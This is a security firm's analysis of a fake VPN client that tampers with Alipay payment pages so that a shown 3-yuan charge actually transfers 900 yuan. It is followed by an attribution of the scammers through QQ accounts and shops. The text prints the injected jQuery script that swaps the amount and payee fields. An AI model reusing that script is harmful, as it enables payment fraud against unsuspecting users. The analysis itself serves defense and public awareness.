1. 程式人生 > >轉賬3塊扣1900?對支付寶木馬的分析與追蹤

轉賬3塊扣1900?對支付寶木馬的分析與追蹤

背景分析

支付寶作為國內線上支付市場的老大飽受惡意程式碼的侵擾,黑產總在如何通過支付寶騙取錢財上發揮著聰明才智。

熟悉網路安全、破解逆向的朋友一定對於52pojie這個網站不會感到陌生,它是我國為數不多的關注計算機軟體安全的技術網站。本次事件發端於52pojie上的一篇名為支付寶轉3塊扣1900,這是咋回事 ”的貼子,說了這樣一個經歷:樓主在網上買VPN代理想科學上網,用支付寶付款時顯示3塊錢,但輸完支付寶驗證碼後卻被扣了1900元。而這背後究竟發生了些什麼?

過程分析

根據帖子中的描述,我們試著訪問提及的網站hxxp://cctv168.cc/,而網友之所以找到這個網站,是通過搜尋引擎搜尋VPN的時候,進入釣魚頁面,然後網友下載該VPN而受騙,而現在搜尋關鍵詞“VPN”已經找不到這個站了。如圖:

支付寶木馬

在瀏覽器中輸入網址,回車後現在看到明確的惡意網站提示:

支付寶木馬

我們當然忽略警告繼續訪問,背後的網站是這個樣子:

支付寶木馬

帖子中的當事人很可能沒能安裝使用360衛士,不然幾乎不可能在層層提示下還會一條道走到黑。現實是我們的可憐樓主可能真的就下載運行了惡意網站誘導的所謂VPN客戶端程式,樣本執行後,向用戶展示介面如下介面:

支付寶木馬

當然,只是不管你在何時以何種姿勢點選連線,都會提示您會員已經過期。沒辦法,只有點選購物車按鈕,購買會員才能使用。

在購買介面,給出的應付金額是3元,在這個黃金週的旅遊景區,上個廁所都比這個貴,所以分分鐘就點選了同意開通。

支付寶木馬

事實上點選了同意開通後,樣本執行了如下不為使用者所知的動作:

1. 訪問http://463038264.lofter.com網站,讀取到包括每次轉賬的金額(這裡為每次轉900元)、轉賬時顯示的支付寶姓名(這裡為長江電子商務有限公司)以及支付寶賬號([email protected])等配置資訊。

支付寶木馬

2. 帶著http://www.alipay.com引數啟動IEXPLORE.EXE,使用易語言(惡意程式碼作者的日常之選)封裝的DOM類庫,查詢當前瀏覽器是不是正在進行付款操作。

支付寶木馬

3. 如果當前正在進行付款操作,根據付款的流程,修改網頁的顯示。使用易語言的類成員方法(0x4040DB處),修改頁面顯示內容。此處方法有兩個引數,引數一為“exescript”,引數二為要執行的指令碼程式碼。將頁面上顯示的金額資訊與付款金額填寫為下圖樣式。至此,細心的人應該發現,軟體能夠幫你把金額和收款人自動填寫上,當然也可以悄無聲息地修改資訊。

支付寶木馬

引數二的指令碼內容為:

seajs.use(“jquery”,function($)

{$(‘#reason’).val(‘USERvpn111 MCZ2016254525’);

$(‘#ipt-search-key’).val([email protected]);

vara1=$(‘#amount’).clone();

$(‘#amount’).css(‘display’,‘none’);

$(‘#amunt’).val(‘900’);a1.val(‘3’);

a1.attr(‘id’,‘amount1’);

a1.removeAttr(‘name’);

a1.insertAfter($(‘label[for=”amount”]’));

}

);

支付寶木馬

4. 在上一步的操作中,支付寶實際支付的金額已經被修改成了900元,只不是因為軟體作者通過指令碼將顯示的數字改成3元。在支付寶付款過程中,單擊下一步後,正常的頁面應該是這樣的:

支付寶木馬

而在軟體的幫忙下通過0x4046D6處函式的呼叫將頁面做了瞞天過海式的修改:

一、將付款金額改成3元,

二、將收款人修改成“長江電子商務有限公司“,在短短不到一秒鐘的時間裡,讓人眼不見心不煩,提升了購物體驗。

支付寶木馬

修改頁面的程式碼:

支付寶木馬

5. 在付款的最後一步,使用與第四步同樣的障眼手法。被修改之前:

支付寶木馬

支付寶木馬

修改後:

支付寶木馬

6. 最後,真實的交易資料被髮送到伺服器。事已至此,雖然肉眼已經無法再辨別出網頁顯示其實已經被篡改過,但從網路流量中發出的付款金額為900元。

支付寶木馬

此時,看起來只支援了3元的一次完整購買過程就結束了。待事後事主看支付寶日誌記錄,才會發現轉出的是900元,而不是3元。而這時,木馬作者極可能正拿著這些錢吃著火鍋唱著歌,還把著妹……

木馬溯源

木馬使用易語言編寫,原理也並不複雜,技術方面沒有太多值得細講的地方。我們關心的是這種盜錢木馬出自誰手?又經誰手進入網路?依賴360威脅情報中心的資料,追查其幕後黑手卻也並不是什麼難事,接著往下看。

樣本中的配置檔案來自於http://463038264.lofter.com網站,網頁上出現了兩個可疑的號碼,463038264和2953766158,確認兩個號碼是QQ號。

支付寶木馬

在QQ簽名信息是“1元1000鑽石充值地址:http://dwz.cn/34thJj (下載前關閉防毒),活動僅限於4月9號晚12點,明天恢復正常價格!”,訪問http://dwz.cn/34thJj,得到一批同源樣本:

支付寶木馬

通過特徵從360樣本庫中找到一些同源樣本,發現木馬作者有好多種騙錢的程式,整理後如圖:

支付寶木馬

通過對同源樣本的挖掘和網上某社工庫的查詢,發現該團伙如下:牧馬人A和開發人員B。

一、 牧馬人A

牧馬人A是實際操作詐騙的人。根據配置網頁中提供的號碼為2053766158,如圖為該QQ的個人資料頁:

支付寶木馬

通過搜尋該QQ號,可以確定這個QQ號屬於木馬使用者,這是網友李安在5月14日發的被詐騙的資訊:

支付寶木馬

通過對該QQ和同源樣本的挖掘找到了該QQ作者的大號:258****:

支付寶木馬

而且,還有一名徒弟的出場客串:

支付寶木馬

該帥哥的價值觀嚴重扭曲:

支付寶木馬

同時,通過樣本又關聯到該木馬作者的兩外要給另外一配置檔案地址:

http://yanhuaxiang396.lofter.com/

支付寶木馬

深入挖掘,發現他們開了一家公司:揚州**電子商務有限公司,這公司當然做SEO非常牛逼,因為是電子商務公司,而A有可能是公司的一個員工,在幹私活,通過學到的SEO技術去做優化,把自己的VPN釣魚站拍到搜尋引擎前面。

支付寶木馬

二、開發人員B:

開發人員B是詐騙軟體開發的人,同時還是一個定製開發易語言程式的,他的QQ為12077*****:

支付寶木馬

然後從QQ的個人說明中,找到了他家的店鋪:

支付寶木馬

根據他阿里旺旺的資訊,找到了另外的一個QQ:10092*****

支付寶木馬

根據他阿里旺旺的資訊,找到了另外的一個QQ:10092*****

支付寶木馬

通過對該QQ小號的關聯,發現了他的大號4470*****,從資料上看是一個從事網際網路行業的人,吉林的,從群關係資料庫可以看出他學習易語言和開發外掛已經很久了:

支付寶木馬

通過查詢群關係資料庫,

支付寶木馬

通過搜尋引擎搜尋該QQ,找到了作者的手機、郵箱和真名,如圖:

支付寶木馬

這是整個團伙的分工圖:

支付寶木馬

此外,作者充值業務廣泛,包含但不限於以下業務:

支付寶木馬

支付寶木馬 支付寶木馬 支付寶木馬 支付寶木馬

小結

木馬作者使用的手段並不新奇,如果當時能夠不輕信,如果當時能夠不關殺軟……但是沒有如果。不誇張地說,現今的網路處處遍佈陷井,保持安全軟體的實時防護狀態並及時安裝漏洞補丁,才有可能在這魔鬼出沒的世界中避免遭受欺詐和數字綁票。但是,武裝到牙齒就夠了嗎?很多時候人總是帶著僥倖的心理,人性的弱點最難以克服,no patch to stupid,再強大的安全工具在哪怕不那麼高明的社工面前也往往一觸即潰。控制好奇心,抵制貪婪,遏制恐懼,這些是一生的修行。

順祝各位看官520表白成功!

文/360天眼實驗室

原文出處——FreeBuf黑客與極客(FreeBuf.COM)